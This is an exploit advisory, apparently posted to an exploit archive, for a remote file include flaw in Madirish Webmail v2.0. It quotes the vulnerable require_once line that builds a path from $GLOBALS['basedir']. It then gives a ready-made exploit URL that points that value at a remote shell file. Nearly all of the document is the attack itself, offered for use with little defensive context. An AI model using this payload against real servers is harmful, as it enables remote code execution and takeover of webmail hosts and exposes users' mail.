###########################################################
Madirish Webmail v2.0 Remote File Include Vulnerabilities
Author : BoZKuRTSeRDaR
Contact MSN:[email protected]
My Homepage :WwW.Turkmilliyetcileri.OrG
script Download : http://sourceforge.net/projects/madirishwebmail
###############################################################################
vuln code:
require_once($GLOBALS['basedir']."lib/sql.php")
exploit:
http://www.example.com/[patch]lib/addressbook.php?GLOBALS[basedir]=shell.txt
?